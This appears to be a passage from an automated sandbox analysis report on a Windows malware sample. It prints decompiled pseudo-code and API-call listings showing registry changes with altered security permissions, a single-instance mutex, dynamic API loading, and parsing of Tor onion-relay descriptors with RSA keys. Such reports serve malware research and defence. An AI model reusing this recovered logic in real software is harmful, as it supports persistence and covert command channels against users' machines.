    				memset( &_v516, 0, 0x200);
    				E003C9090(_t29,  &_v516, 0xc8);
    				_t19 =  &_v516;
    				E003E0640(_t19, __edi, __esi); // executed
    				memset(_t19, 0, 0x200);
    				E003C9090(_t29, _t19, 0xc9);
    				_t12 =  &((StrStrW(_t19, 0x3e32c4))[1]);
    				E003CF630(0x80000002,  &((StrStrW(_t19, 0x3e32c4))[1])); // executed
    				E003E0640(_t19, __edi, __esi); // executed
    				memset(_t19, 0, 0x200);
    				E003C9090(_t12, _t19, 0xca);
    				_t18 = E003E0640(_t19, __edi, __esi); // executed
    				return _t18;
    			}

    APIs
    • memset.MSVCRT ref: 003E07A8
      • Part of subcall function 003E0640: StrChrW.SHLWAPI(?,0000005C), ref: 003E0673
      • Part of subcall function 003E0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E0688
      • Part of subcall function 003E0640: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003E06AD
      • Part of subcall function 003E0640: StrChrW.SHLWAPI(?,0000005C), ref: 003E06D6
      • Part of subcall function 003E0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E06F1
      • Part of subcall function 003E0640: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003E0716
      • Part of subcall function 003E0640: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003E0732
    • memset.MSVCRT ref: 003E07D5
    • StrStrW.SHLWAPI(?,003E32C4), ref: 003E07F2
      • Part of subcall function 003CF630: memset.MSVCRT ref: 003CF660
      • Part of subcall function 003CF630: memcpy.MSVCRT ref: 003CF66B
    • memset.MSVCRT ref: 003E0817
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 58%
    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				long _t27;
    				signed int _t28;
    				signed int _t29;
    				signed int _t30;
    				int* _t31;
    				int _t32;
    				int _t34;
    				signed int _t41;
    				signed int _t44;
    				signed int _t47;
    				long _t57;
    				signed int _t59;
    				void* _t61;
    				intOrPtr _t69;
    
    				E003C7131();
    				_push(0x5c);
    				_push(0x3e6b40);
    				E003E27E4(__ebx, __edi, __esi);
    				 *(_t61 - 0x1c) = 0;
    				 *((intOrPtr*)(_t61 - 4)) = 0;
    				GetStartupInfoW(_t61 - 0x6c);
    				 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
    				 *((intOrPtr*)(_t61 - 4)) = 1;
    				_t57 =  *( *[fs:0x18] + 4);
    				 *((intOrPtr*)(_t61 - 0x20)) = 0;
    				while(1) {
    					_t27 = InterlockedCompareExchange(0x3e8c3c, _t57, 0);
    					if(_t27 == 0) {
    						break;
    					}
    					if(_t27 != _t57) {
    						Sleep(0x3e8);
    						continue;
    					} else {
    						_t59 = 1;
    						 *((intOrPtr*)(_t61 - 0x20)) = 1;
    					}
    					L7:
    					_t28 =  *0x3e8c38; // 0x2
    					if(_t28 != _t59) {
    						_t29 =  *0x3e8c38; // 0x2
    						__eflags = _t29;
    						if(__eflags != 0) {
    							 *0x3e865c = _t59;
    							goto L14;
    						} else {
    							 *0x3e8c38 = _t59;
    							_t41 = E003D1B59(0x3e3240, 0x3e324c); // executed
    							__eflags = _t41;
    							if(__eflags == 0) {
    								goto L14;
    							} else {
    								goto L40;
    							}
    						}
    					} else {
    						_push(0x1f);
    						L003CF19C();
    						L14:
    						_t30 =  *0x3e8c38; // 0x2
    						if(_t30 == _t59) {
    							_push(0x3e323c);
    							_push(0x3e3234); // executed
    							L003C27A8(); // executed
    							 *0x3e8c38 = 2;
    						}
    						if( *((intOrPtr*)(_t61 - 0x20)) == 0) {
    							InterlockedExchange(0x3e8c3c, 0);
    						}
    						_t69 =  *0x3e8c40; // 0x0
    						if(_t69 != 0) {
    							_push(0x3e8c40);
    							if(E003C3D60(0, 0x3e8c3c, _t59, _t69) != 0) {
    								 *0x3e8c40(0, 2, 0);
    							}
    						}
    						_t31 = __imp___wcmdln;
    						if( *_t31 == 0) {
    							L40:
    							 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
    							_t32 = 0xff;
    						} else {
    							_t34 =  *_t31;
    							while(1) {
    								 *(_t61 - 0x24) = _t34;
    								_t44 =  *_t34 & 0x0000ffff;
    								if(_t44 > 0x20 || _t44 != 0 &&  *(_t61 - 0x1c) != 0) {
    									goto L34;
    								} else {
    									goto L26;
    								}
    								while(1) {
    									L26:
    									_t47 =  *_t34 & 0x0000ffff;
    									if(_t47 == 0 || _t47 > 0x20) {
    										break;
    									}
    									_t34 = _t34 + 2;
    									 *(_t61 - 0x24) = _t34;
    								}
    								__eflags =  *(_t61 - 0x40) & 0x00000001;
    								if(( *(_t61 - 0x40) & 0x00000001) == 0) {
    									_t44 = 0xa;
    								} else {
    									_t44 =  *(_t61 - 0x3c) & 0x0000ffff;
    								}
    								_push(_t44);
    								_push(_t34);
    								_push(0);
    								_push(0x3c0000); // executed
    								L003CFBF0(); // executed
    								 *0x3e8658 = _t34;
    								__eflags =  *0x3e864c; // 0x0
    								if(__eflags == 0) {
    									exit(_t34);
    									goto L34;
    								}
    								__eflags =  *0x3e865c; // 0x0
    								if(__eflags == 0) {
    									__imp___cexit();
    								}
    								 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
    								_t32 =  *0x3e8658; // 0x0
    								goto L41;
    								L34:
    								__eflags = _t44 - 0x22;
    								if(_t44 == 0x22) {
    									__eflags =  *(_t61 - 0x1c);
    									_t19 =  *(_t61 - 0x1c) == 0;
    									__eflags = _t19;
    									 *(_t61 - 0x1c) = 0 | _t19;
    								}
    								_t34 = _t34 + 2;
    							}
    						}
    					}
    					L41:
    					return E003E2829(_t32);
    				}
    				_t59 = 1;
    				__eflags = 1;
    				goto L7;
    			}

    APIs
      • Part of subcall function 003C7131: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003C7168
      • Part of subcall function 003C7131: GetCurrentProcessId.KERNEL32 ref: 003C7174
      • Part of subcall function 003C7131: GetCurrentThreadId.KERNEL32 ref: 003C717C
      • Part of subcall function 003C7131: GetTickCount.KERNEL32 ref: 003C7184
      • Part of subcall function 003C7131: QueryPerformanceCounter.KERNEL32(?), ref: 003C7190
    • GetStartupInfoW.KERNEL32(?,003E6B40,0000005C), ref: 003E244E
    • InterlockedCompareExchange.KERNEL32(003E8C3C,?,00000000), ref: 003E2476
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003C3500(void** __ecx, void* __eflags) {
    				int _v8;
    				int _v12;
    				int _v16;
    				char _v20;
    				short _v220;
    				intOrPtr _t22;
    				int _t23;
    				void* _t27;
    				int _t28;
    				intOrPtr _t29;
    				intOrPtr _t38;
    				void* _t45;
    				void** _t46;
    				void* _t48;
    				struct _SECURITY_ATTRIBUTES* _t49;
    
    				_t46 = __ecx;
    				_v8 = 0;
    				E003C9090(__eflags,  &_v220, 0xa2);
    				_t22 =  *0x3e8628; // 0x622508
    				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t22 + 0x174))))( &_v220, 1,  &_v8, 0, _t45, _t48); // executed
    				if(_t23 != 0) {
    					_t49 =  &_v20;
    				} else {
    					_v8 = _t23;
    					_t49 = 0;
    				}
    				_v20 = 0xc;
    				_v12 = 0;
    				_v16 = _v8;
    				E003CF0B0( &_v220);
    				_t27 = CreateMutexW(_t49, 1,  &_v220); // executed
    				 *_t46 = _t27;
    				_t28 = _v8;
    				if(_t28 != 0) {
    					_t38 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x9c))))(_t28);
    				}
    				if( *_t46 == 0) {
    					ExitProcess(0);
    				}
    				_t29 =  *0x3e8628; // 0x622508
    				return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x30))))() == 0x000000b7;
    			}

    APIs
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,003E8C3C,000003E7), ref: 003C3542
      • Part of subcall function 003CF0B0: memset.MSVCRT ref: 003CF0CE
      • Part of subcall function 003CF0B0: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 003CF0E2
      • Part of subcall function 003CF0B0: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003CF11E
    • CreateMutexW.KERNELBASE(?,00000001,?), ref: 003C358B
    • ExitProcess.KERNEL32 ref: 003C35AE
    C-Code - Quality: 40%
    			E003E24B9(void* __eax, long __ebx, LONG* __edi, void* __esi) {
    				void* _t17;
    				intOrPtr _t18;
    				int* _t19;
    				int _t20;
    				int _t22;
    				signed int _t25;
    				long _t28;
    				signed int _t31;
    				signed int _t34;
    				LONG* _t38;
    				void* _t40;
    
    				_t39 = __esi;
    				_t38 = __edi;
    				_t28 = __ebx;
    				_t17 = E003D1B59(0x3e3240, 0x3e324c); // executed
    				if(_t17 == 0) {
    					_t18 =  *0x3e8c38; // 0x2
    					__eflags = _t18 - __esi;
    					if(_t18 == __esi) {
    						_push(0x3e323c);
    						_push(0x3e3234); // executed
    						L003C27A8(); // executed
    						 *0x3e8c38 = 2;
    					}
    					__eflags =  *((intOrPtr*)(_t40 - 0x20)) - _t28;
    					if( *((intOrPtr*)(_t40 - 0x20)) == _t28) {
    						InterlockedExchange(_t38, _t28);
    					}
    					__eflags =  *0x3e8c40 - _t28; // 0x0
    					if(__eflags != 0) {
    						_push(0x3e8c40);
    						_t25 = E003C3D60(_t28, _t38, _t39, __eflags);
    						__eflags = _t25;
    						if(_t25 != 0) {
    							 *0x3e8c40(_t28, 2, _t28);
    						}
    					}
    					_t19 = __imp___wcmdln;
    					__eflags =  *_t19 - _t28;
    					if( *_t19 == _t28) {
    						L28:
    						 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
    						_t20 = 0xff;
    						goto L29;
    					} else {
    						_t22 =  *_t19;
    						while(1) {
    							 *(_t40 - 0x24) = _t22;
    							_t31 =  *_t22 & 0x0000ffff;
    							__eflags = _t31 - 0x20;
    							if(_t31 > 0x20) {
    								goto L22;
    							}
    							__eflags = _t31 - _t28;
    							if(_t31 == _t28) {
    								while(1) {
    									L14:
    									_t34 =  *_t22 & 0x0000ffff;
    									__eflags = _t34 - _t28;
    									if(_t34 == _t28) {
    										break;
    									}
    									__eflags = _t34 - 0x20;
    									if(_t34 > 0x20) {
    										break;
    									}
    									_t22 = _t22 + 2;
    									 *(_t40 - 0x24) = _t22;
    								}
    								__eflags =  *(_t40 - 0x40) & 0x00000001;
    								if(( *(_t40 - 0x40) & 0x00000001) == 0) {
    									_t31 = 0xa;
    								} else {
    									_t31 =  *(_t40 - 0x3c) & 0x0000ffff;
    								}
    								_push(_t31);
    								_push(_t22);
    								_push(_t28);
    								_push(0x3c0000); // executed
    								L003CFBF0(); // executed
    								 *0x3e8658 = _t22;
    								__eflags =  *0x3e864c - _t28; // 0x0
    								if(__eflags != 0) {
    									__eflags =  *0x3e865c - _t28; // 0x0
    									if(__eflags == 0) {
    										__imp___cexit();
    									}
    									 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
    									_t20 =  *0x3e8658; // 0x0
    									L29:
    									return E003E2829(_t20);
    								} else {
    									exit(_t22);
    									goto L22;
    								}
    							}
    							__eflags =  *(_t40 - 0x1c) - _t28;
    							if( *(_t40 - 0x1c) != _t28) {
    								goto L22;
    							}
    							goto L14;
    							L22:
    							__eflags = _t31 - 0x22;
    							if(_t31 == 0x22) {
    								__eflags =  *(_t40 - 0x1c) - _t28;
    								_t11 =  *(_t40 - 0x1c) == _t28;
    								__eflags = _t11;
    								 *(_t40 - 0x1c) = 0 | _t11;
    							}
    							_t22 = _t22 + 2;
    						}
    					}
    				}
    				goto L28;
    			}

    C-Code - Quality: 100%
    			E003CF250(void* __eflags, struct HINSTANCE__* _a4) {
    				short _v204;
    				char _v464;
    				_Unknown_base(*)()* _t14;
    				intOrPtr* _t17;
    				_Unknown_base(*)()** _t23;
    				intOrPtr _t24;
    				void* _t25;
    				void* _t26;
    
    				_t17 = _a4;
    				E003C9090(__eflags,  &_v204,  *_t17);
    				_t26 = _t25 + 8;
    				_t14 = LoadLibraryW( &_v204);
    				_t4 = _t17 + 0xc; // 0xcccccccc
    				_t5 = _t17 + 4; // 0x754f10c6
    				_t24 =  *_t5;
    				_t23 =  *_t4 +  *0x3e8628;
    				_a4 = _t14;
    				_t7 = _t17 + 8; // 0xc35e5ff1
    				if(_t24 <=  *_t7) {
    					do {
    						E003C6CB0( &_v464, _t24);
    						_t26 = _t26 + 8;
    						_t14 = GetProcAddress(_a4,  &_v464);
    						 *_t23 = _t14;
    						_t24 = _t24 + 1;
    						_t23 = _t23 + 4;
    						_t11 = _t17 + 8; // 0xc35e5ff1
    					} while (_t24 <=  *_t11);
    				}
    				return _t14;
    			}

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 003CF278
    • GetProcAddress.KERNEL32(003C3E17,?), ref: 003CF2AD
    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 003CBAF4
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 003CBB13
    C-Code - Quality: 95%
    			E003CF630(void* _a4, void* _a8) {
    				void* _t12;
    				intOrPtr _t13;
    				void* _t14;
    				short _t23;
    				short* _t26;
    				short _t27;
    				short _t28;
    				void* _t30;
    				short _t31;
    				intOrPtr _t34;
    				intOrPtr _t36;
    				void* _t41;
    				int _t42;
    				short* _t43;
    				void* _t47;
    				void* _t48;
    				void* _t50;
    				void* _t51;
    
    				_t12 = _a8;
    				if(_t12 != 0) {
    					_t13 =  *0x3e8628; // 0x622508
    					_t31 = 0;
    					_t14 =  *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc))))(_t12, _t41, _t47, _t30);
    					_t4 = _t14 + 2; // 0x2
    					_t42 = _t14 + _t4;
    					_t48 = E003D1D90(_t42, 0);
    					memset(_t48, 0, _t42);
    					memcpy(_t48, _a8, _t42);
    					_t34 =  *0x3e8628; // 0x622508
    					_t51 = _t50 + 0x20;
    					_t7 = _t48 + 2; // 0x2
    					_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1e0))))(_t7, 0x3e32c4);
    					__eflags = _t43;
    					if(_t43 != 0) {
    						while(1) {
    							_t35 = _a4;
    							 *_t43 = 0; // executed
    							_t23 = E003CCEA0(_a4, _t48); // executed
    							_t31 = _t23;
    							_t51 = _t51 + 8;
    							__eflags = _t31;
    							if(__eflags == 0) {
    								_push(0);
    								_t28 = E003C97E0(_t35, __eflags, _a4, _t48); // executed
    								_t51 = _t51 + 0xc;
    								_t31 = _t28;
    							}
    							 *_t43 = 0x5c;
    							__eflags = _t31;
    							if(_t31 == 0) {
    								goto L9;
    							}
    							_t36 =  *0x3e8628; // 0x622508
    							_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1e0))))(_t43 + 2, 0x3e32c4);
    							__eflags = _t43;
    							if(_t43 != 0) {
    								continue;
    							} else {
    								_t46 = _a4;
    								_t26 = E003CCEA0(_a4, _t48); // executed
    								_t51 = _t51 + 8;
    								__eflags = _t26;
    								if(__eflags == 0) {
    									_push(0);
    									_t27 = E003C97E0(_t36, __eflags, _t46, _t48); // executed
    									_t51 = _t51 + 0xc;
    									_t31 = _t27;
    								}
    							}
    							goto L9;
    						}
    					}
    					L9:
    					E003CBB40(_t48);
    					return _t31;
    				} else {
    					return 0;
    				}
    			}

    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • memset.MSVCRT ref: 003CF660
    • memcpy.MSVCRT ref: 003CF66B
      • Part of subcall function 003C97E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 003C982A
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003CCEA0: lstrlenW.KERNEL32(?,?,?,?,003C97FA,?,?), ref: 003CCEBD
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEE1
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEFC
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCF1C
    C-Code - Quality: 93%
    			E003C3DD0(void* __eax) {
    				void* _t2;
    				void* _t4;
    				int _t5;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x208);
    				L003CA47E();
    				_t5 = __eax;
    				_t8 = _t7 + 4;
    				_t9 = __eax;
    				if(__eax == 0) {
    					 *0x3e8628 = 0;
    				} else {
    					memset(__eax, 0, 0x208);
    					_t8 = _t8 + 0xc;
    					 *0x3e8628 = _t5;
    				}
    				_t6 = 0x3e8048;
    				_t4 = 8;
    				do {
    					_t2 = E003CF250(_t9, _t6); // executed
    					_t8 = _t8 + 4;
    					_t6 = _t6 + 0x10;
    					_t4 = _t4 - 1;
    				} while (_t4 != 0);
    				return _t2;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C3DD7
    • memset.MSVCRT ref: 003C3DED
      • Part of subcall function 003CF250: LoadLibraryW.KERNEL32(?), ref: 003CF278
      • Part of subcall function 003CF250: GetProcAddress.KERNEL32(003C3E17,?), ref: 003CF2AD
    C-Code - Quality: 40%
    			E003C6D30() {
    				char _v8;
    				long _v12;
    				long _v16;
    				short _v20;
    				char _v24;
    				void _v100;
    				intOrPtr _t23;
    				intOrPtr _t27;
    				void* _t28;
    				int _t34;
    				intOrPtr _t38;
    				intOrPtr _t42;
    				intOrPtr _t50;
    				intOrPtr _t53;
    				void* _t55;
    
    				_t23 =  *0x3e8628; // 0x622508
    				_v12 = 0;
    				_v16 = 0;
    				_v24 = 0;
    				_v20 = 0x500;
    				_v8 = 0;
    				_t55 = 0;
    				_t8 = _t23 + 0x150; // 0x622658
    				_push( *((intOrPtr*)( *((intOrPtr*)(_t23 + 0x100))))(8,  &_v12));
    				if( *((intOrPtr*)( *_t8))() != 0) {
    					_t34 = GetTokenInformation(_v12, 1,  &_v100, 0x4c,  &_v16); // executed
    					if(_t34 != 0) {
    						_t53 =  *0x3e8628; // 0x622508
    						_push( &_v8);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0x12);
    						_push(1);
    						_push( &_v24);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x158))))() != 0) {
    							_t38 =  *0x3e8628; // 0x622508
    							_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x14c))))(_v100, _v8);
    						}
    					}
    				}
    				_t27 = _v8;
    				if(_t27 != 0) {
    					_t50 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x154))))(_t27);
    				}
    				_t28 = _v12;
    				if(_t28 != 0) {
    					_t42 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xf8))))(_t28);
    				}
    				return _t55;
    			}

    APIs
    • GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 003C6D8D
    C-Code - Quality: 100%
    			E003C97E0(void* __ecx, void* __eflags, void* _a4, short* _a8) {
    				void* _v8;
    				void* _t8;
    				long _t10;
    				intOrPtr _t17;
    				void* _t21;
    				short* _t25;
    
    				_t25 = _a8;
    				_t21 = _a4;
    				_v8 = 0;
    				_t8 = E003CCEA0(_t21, _t25); // executed
    				if(_t8 == 0) {
    					_t10 = RegCreateKeyExW(_t21, _t25, 0, 0, 0, 0x20106, 0,  &_v8, 0); // executed
    					if(_t10 != 0) {
    						goto L1;
    					} else {
    						_t17 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0x198))))(_v8);
    						return 1;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
      • Part of subcall function 003CCEA0: lstrlenW.KERNEL32(?,?,?,?,003C97FA,?,?), ref: 003CCEBD
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEE1
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEFC
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCF1C
    • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 003C982A
    C-Code - Quality: 100%
    			E003C9480() {
    				struct HINSTANCE__* _t3;
    				struct HINSTANCE__* _t4;
    				intOrPtr _t8;
    
    				_t3 =  *0x3e85bc; // 0x0
    				if(_t3 != 0) {
    					_t8 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t8 + 0x1c))))(_t3);
    					 *0x3e85bc = 0;
    				}
    				_t4 =  *0x3e85c4; // 0x0
    				if(_t4 != 0) {
    					FreeLibrary(_t4); // executed
    					 *0x3e85c4 = 0;
    				}
    				return 1;
    			}

    APIs
    • FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    C-Code - Quality: 37%
    			E003E2403() {
    				intOrPtr _t1;
    				WCHAR* _t2;
    
    				_t1 =  *0x3e8980; // 0x0
    				_push(0x3e8654);
    				_push( *0x3e897c);
    				 *0x3e8654 = _t1;
    				_push(0x3e8644);
    				_push(0x3e8648);
    				_push(0x3e8640); // executed
    				_t2 = GetEnvironmentStringsW(); // executed
    				 *0x3e8650 = _t2;
    				return _t2;
    			}

    APIs
    • GetEnvironmentStringsW.KERNELBASE ref: 003E2427

    Non-executed Functions

    C-Code - Quality: 59%
    			E003D528D(intOrPtr _a4, signed int* _a8, char* _a12) {
    				signed int _v8;
    				void* _v12;
    				char* _v16;
    				char* _v20;
    				void** _v24;
    				signed int _v28;
    				char* _v32;
    				void* _v36;
    				char _v52;
    				char* _t73;
    				char* _t74;
    				char* _t75;
    				void* _t76;
    				signed int _t78;
    				void* _t79;
    				void* _t84;
    				char* _t87;
    				char* _t91;
    				char* _t94;
    				int _t96;
    				int _t101;
    				intOrPtr _t102;
    				void* _t103;
    				unsigned int _t104;
    				void* _t108;
    				void* _t113;
    				char* _t122;
    				char* _t124;
    				void* _t125;
    				void* _t136;
    				char* _t139;
    				signed int _t140;
    				signed int* _t141;
    				void* _t143;
    				intOrPtr _t150;
    				void* _t158;
    				void* _t159;
    				signed int _t161;
    				void _t173;
    				void _t174;
    				int _t175;
    				void* _t176;
    				signed int _t178;
    				intOrPtr* _t179;
    				void* _t183;
    				intOrPtr _t190;
    				intOrPtr* _t191;
    				char* _t192;
    				void* _t194;
    				void* _t195;
    				void* _t196;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    
    				_t73 = strstr(_a12, "protocol-versions 2,3");
    				_pop(_t143);
    				if(_t73 != 0) {
    					_t74 = strstr(_a12, "-----BEGIN MESSAGE-----\n");
    					_t75 = strstr(_a12, "\n-----END MESSAGE-----");
    					_t196 = _t195 + 0x10;
    					_t136 =  &(_t74[0x18]);
    					if(_t136 == 0 || _t75 == 0) {
    						L35:
    						_t76 = 0;
    						goto L36;
    					} else {
    						_t175 = _t75 - _t136;
    						if(_t175 <= 0) {
    							goto L35;
    						}
    						_t4 = _t175 + 1; // 0x1
    						_t78 = _t4;
    						_v28 = _t78;
    						_t79 =  *0x3e8538(_t78);
    						_v36 = _t79;
    						memcpy(_t79, _t136, _t175);
    						 *((char*)(_v36 + _t175)) = 0;
    						_t176 =  *0x3e8538(_v28);
    						_v32 = _t176;
    						memset(_t176, 0, _v28);
    						_t84 = E003D3933(_v28, _t143, _v36, _t176);
    						_t197 = _t196 + 0x28;
    						if(_t84 == 0) {
    							L34:
    							 *0x3e8540(_v32);
    							 *0x3e8540(_v36);
    							goto L35;
    						}
    						_v8 = _v8 & 0x00000000;
    						_v28 = _v28 & 0x00000000;
    						_t139 = "-----BEGIN RSA PUBLIC KEY-----";
    						_t87 = strstr(_t176 + 1, _t139);
    						if(_t87 == 0) {
    							L27:
    							_t190 = _a4;
    							L28:
    							if(_v8 <= 0) {
    								L31:
    								_t178 = _v28;
    								if(_t178 <= 0) {
    									goto L34;
    								}
    								_t191 = _t190 + 0x1c;
    								do {
    									 *0x3e8540( *_t191);
    									_t191 = _t191 + 0x20;
    									_t178 = _t178 - 1;
    								} while (_t178 != 0);
    								goto L34;
    							}
    							_t140 = _v8;
    							_t179 = _t190 + 0x18;
    							do {
    								 *0x3e8540( *_t179);
    								_t179 = _t179 + 0x20;
    								_t140 = _t140 - 1;
    							} while (_t140 != 0);
    							goto L31;
    						}
    						_t150 = _a4;
    						_v24 = _t150 + 0x1c;
    						_v20 = _t150 + 0x18;
    						while(1) {
    							_v12 = _t87;
    							_t91 = strstr( &(_t87[1]), "-----END RSA PUBLIC KEY-----");
    							_v16 = _t91;
    							if(_t91 == 0) {
    								break;
    							}
    							_t113 =  *0x3e8538(0x1000);
    							 *_v20 = _t113;
    							memset(_t113, 0, 0x1000);
    							memcpy( *_v20, _v12, _v16 - _v12 + 0x1c);
    							_v8 = _v8 + 1;
    							_v20 =  &(_v20[0x20]);
    							_t122 = strstr( &(_v16[1]), _t139);
    							_t197 = _t197 + 0x24;
    							if(_t122 == 0) {
    								break;
    							}
    							_v12 = _t122;
    							_t124 = strstr( &(_t122[1]), "-----END RSA PUBLIC KEY-----");
    							_v16 = _t124;
    							if(_t124 == 0) {
    								break;
    							}
    							_t125 =  *0x3e8538(0x1000);
    							 *_v24 = _t125;
    							memset(_t125, 0, 0x1000);
    							memcpy( *_v24, _v12, _v16 - _v12 + 0x1c);
    							_v28 = _v28 + 1;
    							_v24 =  &(_v24[8]);
    							_t87 = strstr( &(_v16[1]), _t139);
    							_t197 = _t197 + 0x24;
    							if(_t87 != 0) {
    								continue;
    							}
    							break;
    						}
    						if(_v8 != _v28 || _v8 == 0) {
    							goto L27;
    						} else {
    							_t141 = _a8;
    							 *_t141 =  *_t141 & 0x00000000;
    							_t192 = "\n";
    							_v20 = strtok(_v32, _t192);
    							_t94 = strtok(0, _t192);
    							_t198 = _t197 + 0x10;
    							while(1) {
    								_v24 = _t94;
    								if(_t94 == 0) {
    									break;
    								}
    								_t96 = sscanf(_v24, "onion-port %5s",  &_v52);
    								_t198 = _t198 + 0xc;
    								if(_t96 != 1) {
    									L23:
    									_v20 = _v24;
    									_t94 = strtok(0, _t192);
    									continue;
    								}
    								_t190 = _a4;
    								_t101 = sscanf(_v20, "ip-address %15s", ( *_t141 << 5) + _t190);
    								_t199 = _t198 + 0xc;
    								if(_t101 != 1) {
    									goto L28;
    								}
    								_t158 = ( *_t141 << 5) + _t190;
    								_t183 = _t158 - 1;
    								do {
    									_t102 =  *((intOrPtr*)(_t183 + 1));
    									_t183 = _t183 + 1;
    								} while (_t102 != 0);
    								_t103 =  &_v52;
    								asm("movsw");
    								_t194 = _t103;
    								do {
    									_t173 =  *_t103;
    									_t103 = _t103 + 1;
    								} while (_t173 != 0);
    								_t104 = _t103 - _t194;
    								_t159 = _t158 - 1;
    								do {
    									_t174 =  *(_t159 + 1);
    									_t159 = _t159 + 1;
    								} while (_t174 != 0);
    								_t161 = _t104 >> 2;
    								_t108 = memcpy(_t194 + _t161 + _t161, _t194, memcpy(_t159, _t194, _t161 << 2) & 0x00000003);
    								_t198 = _t199 + 0x18;
    								 *_t141 = _t108;
    								_t192 = "\n";
    								goto L23;
    							}
    							if( *_t141 != _v8) {
    								goto L27;
    							}
    							 *0x3e8540(_v32);
    							 *0x3e8540(_v36);
    							_t76 = 1;
    							L36:
    							return _t76;
    						}
    					}
    				}
    				return _t73;
    			}

    APIs
    Strings
    Memory Dump Source
